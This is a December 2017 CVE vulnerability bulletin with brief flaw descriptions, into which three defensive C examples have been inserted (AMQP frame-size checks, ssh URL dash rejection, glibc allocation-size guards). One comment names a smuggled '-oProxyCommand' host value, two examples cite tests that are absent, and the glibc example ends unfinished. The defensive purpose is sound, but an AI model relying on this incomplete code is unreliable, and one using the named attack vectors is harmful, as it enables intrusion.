Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16408 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of an image conversion, specifically in the Enhanced Metafile Format Plus (EMF+) processing modules. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16401 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11293 | Sources: SECTRACK, CONFIRM

adobe -- acrobat_and_reader
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG2000 codec. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16387 | Sources: BID, SECTRACK, CONFIRM
adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11289 | Sources: BID, SECTRACK, CONFIRM

adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A Server-Side Request Forgery (SSRF) vulnerability exists that could be abused to bypass network access controls.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11291 | Sources: BID, SECTRACK, CONFIRM

adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11287 | Sources: BID, SECTRACK, CONFIRM

adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11288 | Sources: BID, SECTRACK, CONFIRM

adobe -- connect
An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A UI Redress (or Clickjacking) vulnerability exists. This issue has been resolved by adding a feature that enables Connect administrators to protect users from UI redressing (or clickjacking) attacks.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11290 | Sources: BID, SECTRACK, CONFIRM
adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11299 | Sources: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11298 | Sources: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11297 | Sources: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11301 | Sources: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. Adobe Digital Editions parses crafted XML files in an unsafe manner, which could lead to sensitive information disclosure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11273 | Sources: BID, SECTRACK, CONFIRM

adobe -- digital_editions
An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11300 | Sources: BID, SECTRACK, CONFIRM
adobe -- dng_converter
An issue was discovered in Adobe DNG Converter 9.12.1 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11295 | Sources: BID, CONFIRM

adobe -- experience_manager
An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. A cross-site scripting vulnerability in Apache Sling Servlets Post 2.3.20 has been resolved in Adobe Experience Manager.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11296 | Sources: BID, SECTRACK, CONFIRM

adobe -- experience_manager
An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Sensitive tokens are included in HTTP GET requests under certain circumstances.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-3111 | Sources: BID, SECTRACK, CONFIRM

adobe -- experience_manager
An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Adobe Experience Manager has a reflected cross-site scripting vulnerability in the HtmlRendererServlet.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-3109 | Sources: BID, SECTRACK, CONFIRM
adobe -- flash
Adobe Flash Player has an exploitable memory corruption vulnerability in the MP4 atom parser. Successful exploitation could lead to arbitrary code execution. This affects 26.0.0.151 and earlier.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-11282 | Sources: MISC, BID, SECTRACK, REDHAT, MISC, CONFIRM, GENTOO, EXPLOIT-DB, MISC

adobe -- flash
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK metadata functionality. The mismatch between an old and a new object can provide an attacker with unintended memory access, potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11225 | Sources: BID, SECTRACK, REDHAT, CONFIRM, GENTOO

adobe -- flash
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK. The mismatch between an old and a new object can provide an attacker with unintended memory access, potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11215 | Sources: BID, SECTRACK, REDHAT, CONFIRM, GENTOO

adobe -- flash
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of providing language- and region- or country-specific functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-3114 | Sources: BID, SECTRACK, REDHAT, CONFIRM, GENTOO

adobe -- flash
Adobe Flash Player has an exploitable memory corruption vulnerability in the text handling function. Successful exploitation could lead to arbitrary code execution. This affects 26.0.0.151 and earlier.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-11281 | Sources: BID, SECTRACK, REDHAT, CONFIRM, GENTOO, EXPLOIT-DB, EXPLOIT-DB, MISC

adobe -- flash
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer due to an integer overflow; the computation is part of the abstraction that creates an arbitrarily sized transparent or opaque bitmap image. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11213 | Sources: BID, SECTRACK, REDHAT, CONFIRM, GENTOO

adobe -- flash
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of AdobePSDK metadata. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-3112 | Sources: BID, SECTRACK, REDHAT, CONFIRM, GENTOO
adobe -- indesign
An issue was discovered in Adobe InDesign 12.1.0 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11302 | Sources: BID, SECTRACK, CONFIRM

adobe -- photoshop
An issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable use-after-free vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11304 | Sources: BID, SECTRACK, CONFIRM

adobe -- photoshop
An issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11303 | Sources: BID, SECTRACK, CONFIRM

adobe -- shockwave
An issue was discovered in Adobe Shockwave 12.2.9.199 and earlier. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-11294 | Sources: BID, SECTRACK, CONFIRM
amag_technology -- symmetry_door_edge_network_controllers
Incorrect access control in AMAG Symmetry Door Edge Network Controllers (EN-1DBC Boot App 23611 03.60 and STD App 23603 03.60; EN-2DBC Boot App 24451 01.00 and STD App 2461 01.00) enables remote attackers to execute door controller commands (e.g., lock, unlock, add ID card value) by sending unauthenticated requests to the affected devices via Serial over TCP/IP, as demonstrated by a Ud command.
Published: 2017-12-09 | CVSS score: not yet calculated | CVE-2017-16241 | Sources: MISC, MISC, MISC
apache -- qpid_broker-j
In Apache Qpid Broker-J 0.18 through 0.32, if the broker is configured with different authentication providers on different ports, one of which is an HTTP port, then the broker can be tricked by a remote unauthenticated attacker connecting to the HTTP port into using an authentication provider that was configured on a different port. The attacker still needs valid credentials with the authentication provider on the spoofed port. This becomes an issue when the spoofed port has weaker authentication protection (e.g., anonymous access, default accounts) and is normally protected by firewall rules or similar, which can be circumvented by this vulnerability. AMQP ports are not affected. Versions 6.0.0 and newer are not affected.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-15702 | Sources: BID, CONFIRM, MLIST, CONFIRM

apache -- qpid_broker-j
In Apache Qpid Broker-J versions 6.1.0 through 6.1.4 (inclusive) the broker does not properly enforce a maximum frame size in AMQP 1.0 frames. A remote unauthenticated attacker could exploit this to cause the broker to exhaust all available memory and eventually terminate. Older AMQP protocols are not affected.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-15701 | Sources: BID, CONFIRM, MLIST, CONFIRM
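The frame-size check that the second Broker-J entry above describes, as an added example that is not Qpid code: a small C validator for the 8-byte AMQP 1.0 frame header (SIZE, DOFF, TYPE, CHANNEL) that rejects a declared frame size larger than the connection's negotiated max-frame-size before any payload is read or buffered. The header layout and the 512-byte spec minimum for max-frame-size come from the AMQP 1.0 specification; the function and type names are this example's own, and the headers exercised in the test are constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* AMQP 1.0 frame header: SIZE (4 bytes, big-endian, whole frame including the
   header), DOFF (1 byte, header length in 4-byte words, minimum 2),
   TYPE (1 byte: 0 = AMQP, 1 = SASL), CHANNEL (2 bytes, big-endian). */
#define AMQP_FRAME_HEADER_LEN   8u
#define AMQP_MIN_MAX_FRAME_SIZE 512u   /* spec minimum for max-frame-size */

struct amqp_frame_hdr {
    uint32_t size;
    uint8_t  doff;
    uint8_t  type;
    uint16_t channel;
};

enum amqp_hdr_status {
    AMQP_HDR_OK = 0,
    AMQP_HDR_SHORT,      /* fewer than 8 bytes available */
    AMQP_HDR_BAD_SIZE,   /* size smaller than the header itself */
    AMQP_HDR_BAD_DOFF,   /* doff < 2, or extended header longer than the frame */
    AMQP_HDR_TOO_LARGE   /* size exceeds the negotiated max-frame-size */
};

static uint32_t rd_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Validate a frame header. max_frame_size is the value negotiated on this
   connection; until the open performative has been exchanged the spec minimum
   of 512 applies. On AMQP_HDR_TOO_LARGE the peer should be closed with a
   framing error, never read further. */
static enum amqp_hdr_status amqp_parse_frame_header(const uint8_t *buf, size_t len,
                                                    uint32_t max_frame_size,
                                                    struct amqp_frame_hdr *out)
{
    if (len < AMQP_FRAME_HEADER_LEN)
        return AMQP_HDR_SHORT;
    out->size    = rd_be32(buf);
    out->doff    = buf[4];
    out->type    = buf[5];
    out->channel = (uint16_t)(((uint16_t)buf[6] << 8) | buf[7]);
    if (out->size < AMQP_FRAME_HEADER_LEN)
        return AMQP_HDR_BAD_SIZE;
    if (out->doff < 2 || (uint32_t)out->doff * 4u > out->size)
        return AMQP_HDR_BAD_DOFF;
    /* The check the bulletin entry says was missing: without it a peer can
       declare a 4 GiB frame and the broker buffers until memory runs out. */
    if (out->size > max_frame_size)
        return AMQP_HDR_TOO_LARGE;
    return AMQP_HDR_OK;
}

/* Encode a header; used here to build the constructed test frames. */
static void amqp_write_frame_header(uint8_t out[8], uint32_t size, uint8_t doff,
                                    uint8_t type, uint16_t channel)
{
    out[0] = (uint8_t)(size >> 24); out[1] = (uint8_t)(size >> 16);
    out[2] = (uint8_t)(size >> 8);  out[3] = (uint8_t)size;
    out[4] = doff;                  out[5] = type;
    out[6] = (uint8_t)(channel >> 8); out[7] = (uint8_t)channel;
}

/* Build a header with the given size/doff and run it through the validator. */
static enum amqp_hdr_status amqp_check(uint32_t size, uint8_t doff,
                                       uint32_t max_frame_size)
{
    uint8_t hdr[8];
    struct amqp_frame_hdr h;
    amqp_write_frame_header(hdr, size, doff, 0, 0);
    return amqp_parse_frame_header(hdr, sizeof hdr, max_frame_size, &h);
}
```

The order of the checks matters: the size is compared against the limit before any allocation sized by it, and the DOFF bound is checked against the already-validated size, so no later read uses an unchecked length.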
apache -- struts
In Apache Struts 2.5 to 2.5.14, the REST Plugin uses an outdated JSON-lib library that is vulnerable and allows a DoS attack via a malicious request with a specially crafted JSON payload.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-15707 | Sources: BID, SECTRACK, CONFIRM
artica_tech -- web_proxy
Artica Web Proxy before 3.06.112911 allows remote attackers to execute arbitrary code as root by conducting a cross-site scripting (XSS) attack involving the username-form-id parameter to freeradius.users.php.
Published: 2017-12-06 | CVSS score: not yet calculated | CVE-2017-17055 | Sources: MISC, MISC, FULLDISC, EXPLOIT-DB
atlassian -- bitbucket
It is possible to bypass the Bitbucket auto-unapprove plugin via minimal brute force because it relies on asynchronous events on the back end. This allows an attacker to merge any code into unsuspecting repositories. This affects all versions of the auto-unapprove plugin; however, since the auto-unapprove plugin is not bundled with Bitbucket Server, it does not affect any particular version of Bitbucket.
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2017-16857 | Sources: CONFIRM

atlassian -- confluence
The RSS Feed macro in Atlassian Confluence before version 6.5.2 allows remote attackers to inject arbitrary HTML or JavaScript via cross site scripting (XSS) vulnerabilities in various RSS properties which were used as links without restriction on their scheme.
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2017-16856 | Sources: BID, CONFIRM
audible -- amazon_audible_for_windows
ActiveSetupN.exe in Amazon Audible for Windows before November 2017 allows attackers to execute arbitrary DLL code if ActiveSetupN.exe is launched from a directory where an attacker has already created a Trojan horse dwmapi.dll file.
Published: 2017-12-06 | CVSS score: not yet calculated | CVE-2017-17069 | Sources: BID, MISC, MISC

auth0/auth0.js -- auth0/auth0.js
A cross-origin vulnerability has been discovered in the Auth0 auth0.js library affecting versions < 8.12. This vulnerability allows an attacker to acquire authenticated users' tokens and invoke services on a user's behalf if the target site or application uses a popup callback page with auth0.popup.callback().
Published: 2017-12-06 | CVSS score: not yet calculated | CVE-2017-17068 | Sources: CONFIRM
buffalo -- multiple_products
Cross-site scripting vulnerability in Buffalo BBR-4HG and BBR-4MG broadband routers with firmware 1.00 to 1.48 and 2.00 to 2.07 allows an attacker to inject arbitrary web script or HTML via unspecified vectors.
Published: 2017-12-08 | CVSS score: not yet calculated | CVE-2017-10896 | Sources: CONFIRM, JVN

buffalo -- multiple_products
Input validation issue in Buffalo BBR-4HG and BBR-4MG broadband routers with firmware 1.00 to 1.48 and 2.00 to 2.07 allows an attacker to cause the device to become unresponsive via unspecified vectors.
Published: 2017-12-08 | CVSS score: not yet calculated | CVE-2017-10897 | Sources: CONFIRM, JVN
cisco -- umbrella_virtual_appliance
The Cisco Umbrella Virtual Appliance Version 2.0.3 and prior contained an undocumented encrypted remote support tunnel (SSH) which auto-initiated from the customer's appliance to Cisco's SSH Hubs in the Umbrella datacenters. These tunnels were primarily leveraged for remote support and allowed authorized/authenticated personnel from the Cisco Umbrella team to access the appliance remotely and obtain full control without explicit customer approval. To address this vulnerability, the Umbrella Virtual Appliance version 2.1.0 now requires explicit customer approval before an SSH tunnel from the VA to the Cisco terminating server can be established.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-6679 | Sources: BID, MISC, MISC, MISC

claymore -- dual_gpu_miner
The remote management interface on the Claymore Dual GPU miner 10.1 is vulnerable to an authenticated directory traversal, exploited by issuing a specially crafted request, that allows a remote attacker to read or write arbitrary files. It can be exploited via ../ sequences in the pathname passed to miner_file or miner_getfile.
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2017-16929 | Sources: MISC, MISC

claymore -- dual_gpu_miner
The remote management interface on the Claymore Dual GPU miner 10.1 allows an unauthenticated remote attacker to execute arbitrary code due to a stack-based buffer overflow in the request handler. This can be exploited via a long API request that is mishandled during logging.
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2017-16930 | Sources: MISC, MISC
debian -- debian
The pg_ctlcluster script in the postgresql-common package in Debian wheezy before 134wheezy5, in Debian jessie before 165+deb8u2, in Debian unstable before 178, in Ubuntu 12.04 LTS before 129ubuntu1.2, in Ubuntu 14.04 LTS before 154ubuntu1.1, in Ubuntu 16.04 LTS before 173ubuntu0.1, in Ubuntu 17.04 before 179ubuntu0.1, and in Ubuntu 17.10 before 184ubuntu1.1 allows local users to gain root privileges via a symlink attack on a logfile in /var/log/postgresql.
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2016-1255 | Sources: UBUNTU, UBUNTU, CONFIRM, MLIST

debian -- debian
The apt package in Debian jessie before 1.0.9.8.4, in Debian unstable before 1.4~beta2, in Ubuntu 14.04 LTS before 1.0.1ubuntu2.17, in Ubuntu 16.04 LTS before 1.2.15ubuntu0.2, and in Ubuntu 16.10 before 1.3.2ubuntu0.1 allows man-in-the-middle attackers to bypass a repository-signing protection mechanism by leveraging improper error handling when validating InRelease file signatures.
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2016-1252 | Sources: MISC, UBUNTU, MISC, CONFIRM, DEBIAN, EXPLOIT-DB

debian -- debian
The most package in Debian wheezy before 5.0.0a-2.2, in Debian jessie before 5.0.0a-2.3+deb8u1, and in Debian unstable before 5.0.0a-3 allows remote attackers to execute arbitrary commands via shell metacharacters in the name of an LZMA-compressed file.
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2016-1253 | Sources: MLIST, BID, CONFIRM, MLIST
dell -- 2335dn_and_2355dn_multifunction_laser_printers
The web user interface of Dell 2335dn and 2355dn Multifunction Laser Printers, firmware versions prior to V2.70.06.26 A13 and V2.70.45.34 A10 respectively, is affected by a cross-site scripting vulnerability. Attackers could potentially exploit this vulnerability to execute arbitrary HTML or JavaScript code in the user's browser session in the context of the affected website.
Published: 2017-12-07 | CVSS score: not yet calculated | CVE-2017-14386 | Sources: CONFIRM, CONFIRM

dell -- storage_manager
The SMI-S service in Dell Storage Manager versions earlier than 16.3.20 (aka 2016 R3.20) is protected using a hard-coded password. A remote user with knowledge of the password might potentially disable the SMI-S service via HTTP requests, affecting storage management and monitoring functionality via the SMI-S interface. This issue, aka DSM-30415, only affects a Windows installation of the Data Collector (not applicable to the virtual appliance).
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2017-14374 | Sources: CONFIRM
digium -- asterisk_open_source
An issue was discovered in chan_skinny.c in Asterisk Open Source 13.18.2 and older, 14.7.2 and older, and 15.1.2 and older, and Certified Asterisk 13.13-cert7 and older. If the chan_skinny (aka SCCP protocol) channel driver is flooded with certain requests, it can cause the asterisk process to use excessive amounts of virtual memory, eventually causing asterisk to stop processing requests of any kind.
Published: 2017-12-01 | CVSS score: not yet calculated | CVE-2017-17090 | Sources: CONFIRM, BID, CONFIRM

elastic -- packetbeat
Packetbeat versions prior to 5.6.4 are affected by a denial of service flaw in the PostgreSQL protocol handler. If Packetbeat is listening for PostgreSQL traffic and a user is able to send arbitrary network traffic to the monitored port, the attacker could prevent Packetbeat from properly logging other PostgreSQL traffic.
Published: 2017-12-08 | CVSS score: not yet calculated | CVE-2017-11480 | Sources: CONFIRM
elastic -- kibana
The Kibana fix for CVE-2017-8451 was found to be incomplete. With X-Pack installed, Kibana versions before 6.0.1 and 5.6.5 have an open redirect vulnerability on the login page that would enable an attacker to craft a link that redirects to an arbitrary website.
Published: 2017-12-08 | CVSS score: not yet calculated | CVE-2017-11482 | Sources: CONFIRM

elastic -- kibana
Kibana versions prior to 6.0.1 and 5.6.5 had a cross-site scripting (XSS) vulnerability via URL fields that could allow an attacker to obtain sensitive information from or perform destructive actions on behalf of other Kibana users.
Published: 2017-12-08 | CVSS score: not yet calculated | CVE-2017-11481 | Sources: CONFIRM
fiyo_cms -- fiyo_cms
Fiyo CMS 2.0.7 has an arbitrary file read vulnerability in dapur/apps/app_theme/libs/check_file.php via $_GET['src'] or $_GET['name'].
Published: 2017-12-04 | CVSS score: not yet calculated | CVE-2017-17104 | Sources: MISC

fiyo_cms -- fiyo_cms
Fiyo CMS 2.0.7 has SQL injection in /apps/app_user/sys_user.php via $_POST[name] or $_POST[email]. This vulnerability can lead to escalation from normal user privileges to administrator privileges.
Published: 2017-12-04 | CVSS score: not yet calculated | CVE-2017-17103 | Sources: MISC

fiyo_cms -- fiyo_cms
Fiyo CMS 2.0.7 has SQL injection in /system/site.php via $_REQUEST['link'].
Published: 2017-12-04 | CVSS score: not yet calculated | CVE-2017-17102 | Sources: MISC
flexsense_ltd -- syncbreeze_enterprise
An unauthenticated SEH-based buffer overflow exists in the HTTP server of Flexense SyncBreeze Enterprise v10.1.16. By sending a GET request of excessive length, a malicious user can overwrite the SEH record and execute a payload that runs under the Windows SYSTEM account.
Published: 2017-12-03 | CVSS score: not yet calculated | CVE-2017-17099 | Sources: MISC, EXPLOIT-DB

fluentd -- fluentd
Escape sequence injection vulnerability in Fluentd versions 0.12.29 through 0.12.40 may allow an attacker to change the terminal UI or execute arbitrary commands on the device via unspecified vectors.
Published: 2017-12-08 | CVSS score: not yet calculated | CVE-2017-10906 | Sources: CONFIRM, CONFIRM, MISC
fossil -- fossil
http_transport.c in Fossil before 2.4, when the SSH sync protocol is used, allows user-assisted remote attackers to execute arbitrary commands via an ssh URL with an initial dash character in the hostname, a related issue to CVE-2017-9800, CVE-2017-12836, CVE-2017-12976, CVE-2017-14176, CVE-2017-16228, CVE-2017-1000116, and CVE-2017-1000117.
Published: 2017-12-07 | CVSS score: not yet calculated | CVE-2017-17459 | Sources: CONFIRM, CONFIRM, CONFIRM
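The dash-hostname problem behind the Fossil entry above, as an added example that is neither Fossil's code nor its patch: a small C splitter for ssh://[user@]host[:port]/path URLs, the argv a naive sync client would hand to the ssh binary, and the check that refuses any component which would become its own argv element while starting with '-'. The mitigation shown is the generic rejection of leading dashes used across this CVE family, not Fossil's specific change; the URLs in the test, including the hypothetical ProxyCommand value, are constructed, and no %xx decoding is performed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

struct ssh_target {
    char user[64];
    char host[256];
    char port[8];
    char path[512];
};

/* Split "ssh://[user@]host[:port]/path". Returns false for a non-ssh URL or
   an empty/overlong authority. */
static bool parse_ssh_url(const char *url, struct ssh_target *t)
{
    static const char prefix[] = "ssh://";
    char authority[384];
    const char *auth, *slash;
    char *at, *colon, *hostpart;
    size_t alen;

    memset(t, 0, sizeof *t);
    if (strncmp(url, prefix, sizeof prefix - 1) != 0)
        return false;
    auth  = url + (sizeof prefix - 1);
    slash = strchr(auth, '/');
    alen  = slash ? (size_t)(slash - auth) : strlen(auth);
    if (alen == 0 || alen >= sizeof authority)
        return false;
    memcpy(authority, auth, alen);
    authority[alen] = '\0';
    snprintf(t->path, sizeof t->path, "%s", slash ? slash : "/");

    hostpart = authority;
    at = strrchr(authority, '@');
    if (at) {                          /* user@ precedes the host */
        *at = '\0';
        snprintf(t->user, sizeof t->user, "%s", authority);
        hostpart = at + 1;
    }
    colon = strrchr(hostpart, ':');
    if (colon) {                       /* :port follows the host */
        *colon = '\0';
        snprintf(t->port, sizeof t->port, "%s", colon + 1);
    }
    snprintf(t->host, sizeof t->host, "%s", hostpart);
    return t->host[0] != '\0';
}

/* The check this CVE family is about: ssh parses any argv element that
   starts with '-' as an option, so a host name of "-oProxyCommand=..."
   makes the client run a command instead of connecting. */
static bool ssh_target_is_safe(const struct ssh_target *t)
{
    return t->host[0] != '-' && t->user[0] != '-' && t->port[0] != '-';
}

/* Build the argv a sync client would exec. Returns the argument count, or 0
   with argv[0] == NULL when the target fails the dash check. argv must hold
   8 entries; the pointers reference t, so t must outlive argv. */
static int build_ssh_argv(const struct ssh_target *t, const char *argv[8])
{
    int n = 0;
    if (!ssh_target_is_safe(t)) {
        argv[0] = NULL;
        return 0;
    }
    argv[n++] = "ssh";
    if (t->port[0]) { argv[n++] = "-p"; argv[n++] = t->port; }
    if (t->user[0]) { argv[n++] = "-l"; argv[n++] = t->user; }
    argv[n++] = t->host;
    argv[n]   = NULL;
    return n;
}

/* Parse a URL and report the argv length that would be exec'd:
   -1 = not an ssh URL, 0 = refused by the dash check, >0 = argc. */
static int ssh_argc_for(const char *url)
{
    struct ssh_target t;
    const char *argv[8];
    if (!parse_ssh_url(url, &t))
        return -1;
    return build_ssh_argv(&t, argv);
}
```

Passing the user as a separate -l argument rather than as user@host keeps the host element free of '@' tricks, and the check is applied to every element the URL controls, not only the host, because the port and user land in argv too.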
game_music_emu -- game_music_emu
The Mem_File_Reader::read_avail function in Data_Reader.cpp in the Game_Music_Emu library (aka game-music-emu) 0.6.1 does not ensure a non-negative size, which allows remote attackers to cause a denial of service (application crash) via a crafted file.
Published: 2017-12-06 | CVSS score: not yet calculated | CVE-2017-17446 | Sources: MISC, MISC

genixcms -- genixcms
GeniXCMS 1.1.5 has XSS via the from, id, lang, menuid, mod, q, status, term, to, or token parameter. NOTE: this might overlap CVE-2017-14761, CVE-2017-14762, or CVE-2017-14765.
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2017-17431 | Sources: MISC

geovap -- reliance_scada
A Cross-site Scripting issue was discovered in Geovap Reliance SCADA Version 4.7.3 Update 2 and prior. This vulnerability could allow an unauthenticated attacker to inject arbitrary code.
Published: 2017-12-04 | CVSS score: not yet calculated | CVE-2017-16721 | Sources: BID, MISC
glibc -- glibc
The malloc function in the GNU C Library (aka glibc or libc6) 2.26 could return a memory block that is too small if an attempt is made to allocate an object whose size is close to SIZE_MAX, potentially leading to a subsequent heap overflow. This occurs because the per-thread cache (aka tcache) feature enables a code path that lacks an integer overflow check.
Published: 2017-12-05 | CVSS score: not yet calculated | CVE-2017-17426 | Sources: CONFIRM, CONFIRM
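The allocation-size arithmetic behind the glibc entry above, as an added C example that mirrors the well-known malloc macros rather than reproducing glibc's source: request2size() pads a user request up to a chunk size without any wrap-around check, and REQUEST_OUT_OF_RANGE() is the guard that the ordinary (non-tcache) path applies before padding. The constants are the x86-64 values (SIZE_SZ 8, alignment 16, MINSIZE 32), which is an assumption about the target; the function names are this example's own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* 64-bit glibc chunk layout (assumption: x86-64). */
#define SIZE_SZ           ((size_t)8)   /* sizeof(INTERNAL_SIZE_T) */
#define MALLOC_ALIGN_MASK ((size_t)15)  /* MALLOC_ALIGNMENT - 1 */
#define MINSIZE           ((size_t)32)  /* smallest chunk */

/* Same arithmetic as glibc's request2size(): add the size word and round up
   to the alignment. The addition is unsigned and silently wraps, so every
   request within 22 bytes of SIZE_MAX comes out as a 32-byte chunk. */
static size_t request2size_unchecked(size_t req)
{
    size_t padded = req + SIZE_SZ + MALLOC_ALIGN_MASK;   /* may wrap */
    if (padded < MINSIZE)
        return MINSIZE;
    return padded & ~MALLOC_ALIGN_MASK;
}

/* Same test as glibc's REQUEST_OUT_OF_RANGE(): anything at or above
   SIZE_MAX - 2*MINSIZE + 1 can never be satisfied and must be refused. */
static bool request_out_of_range(size_t req)
{
    return req >= (size_t)0 - 2 * MINSIZE;
}

/* Guarded conversion, the behaviour of checked_request2size(): refuse before
   padding. Returns false (caller sets ENOMEM, returns NULL) when out of range. */
static bool request2size_checked(size_t req, size_t *chunk_size)
{
    if (request_out_of_range(req))
        return false;
    *chunk_size = request2size_unchecked(req);
    return true;
}

/* Smallest request whose padding wraps: from here to SIZE_MAX the unchecked
   path yields MINSIZE. Equals SIZE_MAX - 22 on this layout. */
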